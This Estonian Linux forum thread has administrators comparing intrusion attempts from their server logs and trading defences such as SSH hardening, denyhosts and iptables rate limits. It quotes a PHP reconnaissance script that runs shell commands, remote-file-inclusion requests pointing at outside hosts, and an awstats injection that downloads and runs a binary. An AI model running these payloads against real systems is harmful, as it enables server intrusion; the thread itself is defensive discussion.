| Autor |
Sõnum |
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
| PHP: | | <?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
?>
|
milleks küll sellise jutuga servereid urgitseda? seda juttu proovitakse käima saada nõnda et kaitsmata muutujale proovitakse teisest servetist see jutt sisse panna et rünnatav servu selle käima tõmbab. kellele on vaja teada kui palju miskis serveris vaba kettaruumi on. ma panin tolle funksiooni keelatute alla ja seda sorti useragenti "libwww-perl/5.808" saadan kuhugi mujale.
kas kellegi on mõni idee taolise nuuskimise ärahoidmiseks?
|
|
|
|
|
|
|
 |
estysoft
Pingviini aktivist
Vanus: 39
Liitunud: 13.07.2006
Postitused: 130
|
|
no kui juba see käima saadakase siis saab ju ka näiteks faile üles laadida ja hostida näiteks.
aga kuidas sa selle leidsid?
ma tahaks ka teada kas mind skännitakse.
|
|
|
|
|
|
|
 |
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
serveri access logi uurides leian alati et keegi kuskilt on proovinud miskit . mõni tüüp haamerdab päris kõvasti enne kui rahule jätab. tundub et automatiseeritud häkkimine toimub.
meili servu admin konto on pideva löögiall, hiinlased tahavad sinna kangesti sisse pääseda.
|
|
|
|
_________________
olen Troll ja ootan pingviin.org konto sulgemist.
|
|
|
|
antik2
Vana Pingviin
Liitunud: 09.10.2006
Postitused: 634
Distributsioon: Big Strong D...
|
|
| olavsu1 kirjutas: | | serveri access logi uurides leian alati et keegi kuskilt on proovinud miskit . mõni tüüp haamerdab päris kõvasti enne kui rahule jätab. tundub et automatiseeritud häkkimine toimub.
meili servu admin konto on pideva löögiall, hiinlased tahavad sinna kangesti sisse pääseda. |
Aga kes keelab sul root kasutaja sisselogimise ssh-s kinni keerata? Logi sisse tavalise kasutajana ja siis pressi -su. Lisaks paigalda denyhosts proge mis jälgib reaalajas kasutajanimede ja paroolide proovimist ning 10 järjestikuse vale logimise järgi blokeerib ründaja ip-aadressi mingiks ajaks.
|
|
|
|
|
|
|
|
spott
Admin
Vanus: 43
Liitunud: 04.06.2005
Postitused: 8857
Distributsioon: Ubuntu
|
|
|
 |
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
server on win2k ja kasutab http://www.sambar.com softi , blokib 5 viie vigase asja järel ja saadab kuhugi umbluu saidile..
mul on slogimiste jälitus serverisse sisse ehitatud
| Kood: | | Monitor Invalid Logins = true
Maximum Invalid Logins = 10
Invalid Login Wait = 600
Monitor Invalid Requests = true
Maximum Invalid Requests = 5
Invalid Request Wait = 3600 |
umbluu saidile saadetakse libwww-perl tegelased ja mõne downloaderi kasutajad veel.
|
|
|
|
|
|
|
|
obundra
Vana Pingviin
Vanus: 49
Liitunud: 04.08.2005
Postitused: 1213
Asukoht: 127.0.0.1
Distributsioon: RHEL, Solaris, Debian, Gentoo
|
|
Mul on ssh konfiga sisselogimine roodule keelatud ja lubatud ainult ühele kindlale listis olevale kasutajale vaid teatud ip-delt.Logifailides leidus muidu ikka iga päeva kohta hunnik sisselogimiskatseid.Lisaks sai tulemüüri lisatud paar reeglit mis sissetrügijaid samuti veidi eemal aitab hoida.Iptablesi skripti tarvis sellised read:
| Kood: | | # ssh-ga saab sisse logida 2X 10 minuti jooksul
iptables -I INPUT -p tcp --dport 22 -i $V2LISLIIDES -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 22 -i $V2LISLIIDES -m state --state NEW -m recent --update --seconds 600 --hitcount 2 -j DROP
# Pordiskänneritele 24 tundi mõtlemisaega
iptables -A INPUT -i $V2LISLIIDES -m recent --name portscan --rcheck --seconds 86400 -j DROP
iptables -A FORWARD -i $V2LISLIIDES -m recent --name portscan --rcheck --seconds 86400 -j DROP
# Peale 24 tundi pordiskännerite list tühjaks
iptables -A INPUT -i $V2LISLIIDES -m recent --name portscan --remove
iptables -A FORWARD -i $V2LISLIIDES -m recent --name portscan --remove |
|
|
|
|
_________________
IT teenused
|
|
|
|
johnsmith
Vana Pingviin
Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
|
|
Ma arvan, et kui inimene oskab juba ssh -ga sisse logida ja üldse cli -d kasutada siis oskab ta ka valida muu pordi kui 22 sisse logides.
Keegi ei viitsi skannida kõiki porte vaid ikka skannitakse tuntuid service porte.
Pane ssh daemon kuulama mingit kõrgemat suvalist porti ja võid ära unustada logifaili lugemise vähemalt mis puudutab ssh -d.
Eelnevalt Obundra poolt mainitud teatud kasutaja lubamine peaks ka olema elementaarne.
|
|
|
|
_________________
"Thinking is the hardest work there is, which is probably the reason why so few engage in it" - Henry Ford
|
|
|
 |
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
| Kood: | | [2007-10-18 06:09:43] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [CONNECT]
[2007-10-18 06:09:48] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [EHLO] UATIM-F7E7949C7
[2007-10-18 06:09:50] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN
[2007-10-18 06:09:51] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH User] webmaster
[2007-10-18 06:09:52] FAILED [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH Passwd] webmaster {Invalid password}
[2007-10-18 06:09:52] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:53] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:54] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:55] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).}
[2007-10-18 06:09:56] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN {Invalid command sequence (AUTH unexpected).} |
meliservu logist (smtp.log) leian alatasa selliseid ridu. SSL iga pole mitte mingit seost.
|
|
|
|
|
|
|
|
antik2
Vana Pingviin
Liitunud: 09.10.2006
Postitused: 634
Distributsioon: Big Strong D...
|
|
| olavsu1 kirjutas: | | Kood: | | [2007-10-18 06:09:43] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [CONNECT]
[2007-10-18 06:09:48] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [EHLO] UATIM-F7E7949C7
[2007-10-18 06:09:50] OK [115986416] [183.73.91.125.broad.st.gd.dynamic.163data.com.cn] [AUTH] LOGIN
[2007-10-18 06:09:51] OK [115986416] pected).} |
meliservu logist (smtp.log) leian alatasa selliseid ridu. SSL iga pole mitte mingit seost. |
Võid rahuliku südamega kõik .cn domeenid ära plokkida ja ei juhtu midagi halba (ainult head).
|
|
|
|
|
|
|
|
imre
Vana Pingviin
Liitunud: 16.08.2005
Postitused: 2648
Asukoht: Saku kant
Distributsioon: Ubuntu
|
|
Ise kasutan johnsmithi soovitatut.
Kõrgema pordi peale ja igasugune scännimine lõppes koheselt.
Aga ma olen laisk ka muidugi 
|
|
|
|
_________________
Enne teema püstitamist kasutage OTSINGUT
Küsi targalt: Infot siit!
Kui aru ei saa, siis küsi.
|
|
|
|
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
| Kood: | | nl61.yourname.nl 82.192.68.61 - - [28/Oct/2007:23:27:59 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/cmd.txt? HTTP/1.1" 403 950 "-" "libwww-perl/5.79"
mail.onco-web.com 69.20.16.245 - - [28/Oct/2007:23:30:02 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.0" 403 950 "-" "libwww-perl/5.53"
mail.onco-web.com 69.20.16.245 - - [28/Oct/2007:23:30:03 +0200] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.0" 403 950 "-" "libwww-perl/5.53" |
sedasi siis käib, kui mul poleks to muutuja kaitstus siis vist avastaksin midagi head ja ilusat oma arvutist.
|
|
|
|
|
|
|
|
olavsu1
Vana Pingviin
Vanus: 48
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
| Kood: | | h162-040-091-117.adsl.navix.net 162.40.91.117 - - [21/Nov/2007:04:41:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 621 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)Connection: close" |
jälle uus ja huvitav asi. juhuks kui keegi saab sellejärgi oma servut turvata.
|
|
|
|
|
|
|
|
|
|
